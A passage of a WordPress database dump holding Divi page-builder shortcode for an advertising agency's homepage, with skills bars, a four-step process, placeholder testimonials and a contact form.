button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:34:52','2020-08-07 14:34:52','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(481,1,'2020-08-07 14:40:59','2020-08-07 14:40:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" 